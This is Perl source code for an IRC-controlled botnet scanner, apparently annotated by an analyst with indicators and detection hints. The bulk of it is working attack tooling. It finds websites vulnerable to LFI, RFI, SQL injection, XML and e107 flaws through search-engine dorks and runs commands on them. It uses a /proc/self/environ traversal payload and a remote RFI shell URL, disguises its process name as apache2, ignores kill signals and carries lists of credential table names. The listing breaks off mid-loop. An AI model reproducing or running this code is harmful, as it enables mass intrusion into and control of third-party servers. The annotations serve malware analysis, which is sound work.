
Bot Scanner

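This document contains the source code of a Perl script that functions as an IRC-controlled, multi-purpose vulnerability scanner and bot. It includes features for scanning websites for SQL injection, local and remote file inclusion, XML injection and an e107 injection flaw. It also allows commands to be executed on remote servers through those vulnerabilities, and it has a "spread" routine that tries to download and run further copies of the bot on affected hosts. The code connects to an IRC server to receive commands and report scan results, and includes functions for encoding/decoding text (the MD5 `!enc`/`!dec` commands) and for joining additional IRC channels.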

#!

/usr/bin/perl
$powered="preda";
$mail="[email protected]";
##############################################################################
#######
##
##
##
23/07/201
0
##
## Author : BaMbY, Voo_Doo
##
## Team
: Irc.Byroe.Net
##
## Modifier : rato
##
## Team
: Irc.NairaLanders.Net
##
##
##
## ## DISCLAIMER ###########################################################
##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY #
##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK!!!
#
##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS FIND BUGS ON
#
##
## # THEIR SYSTEM.
#
##
## ## END OF DISCLAIMER ####################################################
##
##
##
## Features:
##
##
[+]e107 Injection Scanner
##
##
[+]Sql Injection Scanner
##
##
[+]XML (Extensible Markup Language) Injection Scanner
##
##
[+]Remote File Inclusion Scanner
##
##
[+]Local File Inclusion Scanner
##
##
[+]Integrated Shell, so you can execute commands on the server
##
##
[+]Spread Mode, to activate or disable Spread Function
##
##
##
##############################################################################
#######
################################################
use HTTP::Request;
#
use LWP::UserAgent;
#
use IO::Socket;
#
use IO::Select;
#
use IO::Socket::INET;
#

use Socket;
#
use HTTP::Request::Common;
#
use LWP::Simple;
#
use LWP 5.64;
#
use HTTP::Request::Common qw(POST);
#
use Digest::MD5 qw(md5_hex);
#
use MIME::Base64;
#
################################################
#
#
################################################
#
[CONFIGURATION]
#
################################################
# Analyst annotations: every value in this run is operator configuration and
# doubles as an indicator for this specimen.
# Process title that is written to $0 at start-up, so a process listing shows
# an Apache command line instead of a Perl script.
my $fakeproc
= "/usr/sbin/apache2 -k start";
# IRC server and port used as the control channel. The server can be replaced
# by the first command-line argument (see the $ARGV[0] line further down).
$ircserver
= "Diemen.NL.EU.Undernet.Org";
my $ircport
= "6667";
# Nick, ident and real-name values the bot registers with on IRC.
my $nickname
= "predascan1";
my $ident
= "prdsc1";
# Channel the bot joins; the command handlers in the main loop all match on
# "PRIVMSG $channel".
my $channel
= "#mynet";
# Nick that also receives result lines by private message.
my $runner
= "preda";
my $fullname
= 'prdsc1';
# Suffix the LFI scanner appends to candidate URLs: a directory traversal to
# /proc/self/environ ending in an encoded NUL byte. The literal is split over
# two lines in this listing, which embeds a newline in the value as shown
# (NOTE(review): probably a line-wrap from the hosting page — confirm).
my $rspo_test = "../../../../../../../../../../../../../../../proc/self/enviro
n%00";
# URL of a remotely hosted file: appended to candidate URLs by the RFI scanner
# and fetched by the "!respon" command.
# NOTE(review): the "fanyv88.com" prefix looks like a link rewrite added by the
# hosting page rather than part of the original value — confirm against
# another copy of the specimen before using it as an indicator.
my $rfiid
= "http://jewelleryoutlook.com/js/cmd.jpg?";
################################################
#
[COMMANDS]
#
################################################
my $lfi
= "!lfi";
my $xml
= "!xml";
my $e107
= "!e107";
my $sql
= "!sql";
my $rfi
= "!rfi";
my $cmdlfi
= "!cmdlfi";
my $cmde107
= "!cmde107";
my $cmdxml
= "!cmdxml";
################################################
#
[END OF CONFIGURATION]
#
################################################
my @tabele
= ('admin','tblUsers','tblAdmin','user','users','usernam
e','usernames','usuario',
'name','names','nombre','nombres','usuar
ios','member','members','admin_table','miembro','miembros','membername','admins'
,'administrator',
'administrators','passwd','password','pa
sswords','pass','Pass','tAdmin','tadmin','user_password','user_passwords','user_
name','user_names',
'member_password','mods','mod','moderato
rs','moderator','user_email','user_emails','user_mail','user_mails','mail','emai
ls','email','address',
'e-mail','emailaddress','correo','correo
s','phpbb_users','log','logins','login','registers','register','usr','usrs','ps'
,'pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','ni
ck','nicks','manager','managers','administrador','tUser','tUsers','administrador
es','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','co
ntrasena','auth','key','senha','tb_admin','tb_administrator','tb_login','tb_logo
n','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','faz
erlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_
authors','accounts','account','accnts',

'associated','accnt','customers','custom
er','membres','administrateur','utilisateur','tuser','tusers','utilisateurs','pa
ssword','amministratore','god','God','authors',
'asociado','asociados','autores','member
name','autor','autores','Users','Admin','Members','Miembros','Usuario','Usuarios
','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIE
MBRO');
my @kolumny
= ('admin_name','cla_adm','usu_adm','fazer','logon','faz
erlogon','authorization','membros','utilizadores','sysadmin','email',
'user_name','username','name','user','us
er_name','user_username','uname','user_uname','usern','user_usern','un','user_un
','mail',
'usrnm','user_usrnm','usr','usernm','use
r_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id'
,'author',
'sistema_usuario','auth','key','memberna
me','nme','unme','psw','password','user_password','autores','pass_hash','hash','
pass','correo',
'userpass','user_pass','upw','pword','us
er_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','
authors',
'user_pwd','u_pass','clave','usuario','c
ontrasena','pas','sistema_password','autor','upassword','web_password','web_user
name');
# Analyst annotations: start-up sequence.
# INT, HUP, TERM and CHLD are set to IGNORE, so the usual polite termination
# signals have no effect on the process. 'PS' does not look like a standard
# signal name.
$SIG{'INT'}
= 'IGNORE';
$SIG{'HUP'}
= 'IGNORE';
$SIG{'TERM'}
= 'IGNORE';
$SIG{'CHLD'}
= 'IGNORE';
$SIG{'PS'}
= 'IGNORE';
# Work from /tmp.
chdir("/tmp");
# A first command-line argument, when present, replaces the configured server.
$ircserver="$ARGV[0]" if $ARGV[0];
# Overwrite the process title with $fakeproc followed by 16 NUL bytes.
# Detection: a Perl interpreter whose displayed command line reads
# "/usr/sbin/apache2 -k start"; comparing the title with the real executable
# (for example /proc/<pid>/exe on Linux) exposes the mismatch.
$0 = "$fakeproc"."\0"x16;;
# SIGN is not defined in the visible part of the file.
&SIGN();
# Fork; the parent exits and the child carries on in the background.
my $pid = fork;
exit if $pid;
die "\n [!] Something Wrong !!!: $!" unless defined($pid);
# Shared state: %irc_servers holds per-socket connection details and
# $sel_client is the select set the main loop polls for readable sockets.
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
# sendraw: write one raw IRC protocol line to a server socket.
# Called with two arguments, the first is the socket and the second the line;
# called with one, the line goes to the global $IRC_cur_socket.
# A "\n" is appended and nothing else is altered, so whatever text the caller
# interpolated is sent as given.
sub sendraw {
# $#_ is the index of the last argument, so 1 means exactly two arguments.
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
# connector: open the TCP connection to the IRC server and register the bot.
# Arguments: nick, server host, server port.
# Returns 1 when the socket cannot be created.
# On success the socket becomes $IRC_cur_socket, is added to $sel_client, and
# its host, port, nick and local address are recorded in %irc_servers.
# Network indicator: an outbound TCP session to the configured server and port
# that opens with NICK and USER lines carrying the configured nick and ident.
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
# NOTE(review): this listing wraps in the middle of the PeerAddr string.
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_c
on", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";

$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
# nick() is not defined in the visible part of the file.
nick("$mynick");
# USER line: ident, local socket address, server name and real-name field.
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname
");
sleep 1;
}
}
# parse: handle one complete line received from the IRC server.
# Argument: the raw protocol line.
# Handles keep-alive, CTCP VERSION, nick tracking, nick collisions and the
# post-registration join. Uses the globals $mynick, $IRC_cur_socket and
# %irc_servers.
sub parse {
my $servarg = shift;
# Keep-alive: echo the server's PING token back as PONG.
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
# $pn is the sender nick, $hostmask the sender host, $onde the message target
# and $args the message text.
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
# A CTCP VERSION query is answered with a fixed mIRC client string, so the bot
# presents itself as an ordinary desktop IRC client.
# notice() is not defined in the visible part of the file.
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
}
# Text addressed to the bot's nick or prefixed "!a" is captured into two
# locals; nothing further is done with them in this block.
if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
}
}
# NICK message for the bot's own nick: remember the new nick.
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
# Numeric 433 (nick already in use): retry with "|" and a random number below
# 99 appended.
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick|".int rand(99));
# Numeric 001 (registration accepted): record the nick and server name, set
# user modes, join the control channel and announce readiness to the channel
# and to $runner.
# Detection: the fixed announcement text below is a candidate string for
# IRC-traffic signatures. NOTE(review): the digits interleaved in it look like
# mIRC colour codes whose control bytes were lost in this listing — confirm
# against a captured sample before writing a byte-exact signature.
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $nickname +Bx");
sendraw("JOIN $channel");
sendraw("PRIVMSG $channel :14,17ratoscan Multi7-14Scanner is Ready To 7S14can!
");
sendraw("PRIVMSG $runner :14,17H14i $runner my 7L14ord, I'm ready to work for
7Y14ou!!!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircpo
rt"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
$msg =~ s/\r\n$//;
if ($msg=~ /PRIVMSG $channel :!help/){

sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)


14 ################## 7Vuln Scanner 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 ( $rfi/$lfi/$sql/$xml ) [bug] [dork]
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################### 7RCE Command 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 $e107 [dork]
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################# 7Execute Command 14#################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 #7 ( $cmde107 /$cmdlfi / $cmdxml ) [target] [cmd] 14#");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ################### 7md5 Command 14###################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 #
7 !dec / !enc
14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 #################### 7BOT Info 14#####################");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14) 14 # 7 !resp
on | !engine | !pid | !version | !about 14 #");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Help14)
14 ###################################################");
}
if ($msg=~ /PRIVMSG $channel :!version/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Version14) 14 Multi
Scanner v2.1");
}
if ($msg=~ /PRIVMSG $channel :!engine/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Engine14)7 Google, B
ing, AllTheWeb, Altavista, ASK, UOL, Yahoo.");
}
if ($msg=~ /PRIVMSG $channel :!pid/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14PID14)14 Process/ID
: 7 $fakeproc - $$");
}
if ($msg=~ /PRIVMSG $channel :!about/){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Multi Sc
anner v2");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Coded by
BaMbY7 | 14Modified By RatoScan ");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14About14) 14 Copyrigh
t ? 2010 NairaLanders");
}
##################################################################### CM
D IRC
if ($msg=~ /PRIVMSG $channel :!enc\s+(.*)/){
my $enc = $1;
&enc($enc);
}
if ($msg=~ /PRIVMSG $channel :!dec\s+(.*)/){
my $dec = $1;
&dec($dec);
}
if ($msg=~ /PRIVMSG $channel :!btjoin\s+(.*)/){
my $cnls = $1;
&join($cnls);
}
if ($msg=~ /PRIVMSG $channel :!btpart\s+(.*)/){
my $cnls = $1;
&part($cnls);

}
if ($msg=~ /PRIVMSG $channel :!okdeh\s+(.*)/){
my $cnls = $1;
&quit($cnls);
}
# "!respon": fetch the remote file at $rfiid and report to the channel whether
# the response contains the marker "ByroeNet".
# query() is not defined in the visible part of the file.
if ($msg=~ /PRIVMSG $channel :!respon/){
my $re = query($rfiid);
if ( $re =~ /ByroeNet/ ) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Info14) 7 Respon
se is 3WORKING!");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14Info14) 7 Respon
se is 4NOT WORKING!");
}
}
##################################################################### CM
D LFI
# "!cmdlfi <url> <cmd>": append the /proc/self/environ traversal to the given
# URL and pass it, with the command text, to cmdlfi().
# The match looks only at the channel name and the command keyword in the raw
# read buffer; the sender's nick and host are not examined here.
if ($msg=~ /PRIVMSG $channel :$cmdlfi\s+(.*?)\s+(.*)/){
my $url = $1."../../../../../../../../../../../../../../
../proc/self/environ%00";
my $cmd = $2;
&cmdlfi($url,$cmd);
}
#####################################################################
#####################
LFI LFI LFI
###################
##################################################################### Go
ogle Engine
# "!lfi <bug> <dork>", first of seven near-identical handlers (one per search
# engine name). Each one forks twice: the outer parent waits for the first
# child, the first child exits at once, and the grandchild runs the scan
# detached from the main loop.
# Host indicator: one command on the channel produces several short-lived
# child processes, each making outbound HTTP requests.
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
# $bugx is the path fragment to test and $d0rk the search query, both taken
# verbatim from the channel message.
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14LFI14)14 Sea
rch Engines Loading ...");
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;

&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine

if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {


if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$lfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&lfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
#####################################################################
#####################
XML XML XML
###################
################################################################
#####
if ($msg=~ /PRIVMSG $channel :$cmdxml\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd);
}
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)14 Sea
rch Engines Loading ...");
&xmlscan($engx,$bugx,$d0rk);
}
exit;

}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {

if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$xml\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&xmlscan($engx,$bugx,$d0rk);
}
exit;
}
}
################################################################
#####
#####################
RFI RFI RFI
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Dor

k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)14 Sea
rch Engines Loading ...");
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}

}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$rfi\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&rfiscan($engx,$bugx,$d0rk);
}
exit;
}
}
################################################################
#####
#####################
SQL SQL SQL
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {

waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = $1;
my $d0rk = $2;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Dor
k :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Fil
e :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14 Sea
rch Engines Loading ...");
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {

if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$sql\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = $1;
my $d0rk = $2;
&sqlscan($engx,$bugx,$d0rk);
}
exit;
}
}

################################################################
#####
#####################
e107 e107 e107
###################
##################################################################### Go
oGle Engine
if ($msg=~ /PRIVMSG $channel :$cmde107\s+(.*?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmde107($url,$cmd);
}
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "GooGLe";
my $bugx = "/contact.php";
my $d0rk = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Do
rk :7 $d0rk");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Fi
le :7 $bugx");
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)14 Se
arch Engines Loading ...");
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Al
lTheWeb Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AllTheWeb";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Bi
ng Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "Bing";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);

}
exit;
}
}
##################################################################### Al
tavista Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "ALtaViSTa";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### AS
K Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "AsK";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Uo
L Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "UoL";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
##################################################################### Ya
hoo Engine
if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
if (my $pid = fork) {

waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
my $engx = "YahOo";
my $bugx = "/contact.php";
my $d0rk = $1;
&e107scan($engx,$bugx,$d0rk);
}
exit;
}
}
# Reassemble IRC lines from the read buffer and hand each complete line to
# parse(). A partial line left over from the previous read is kept in
# $line_temp and prepended to the first line of this read.
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
# Every line except the last one in the buffer is complete.
unless ($c == $#lines) {
parse("$line");
} else {
# The last line is parsed when it is the only line, when it ended in "\r",
# or when it is a "NOTICE AUTH" line; otherwise it is held back as a partial
# line for the next read.
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
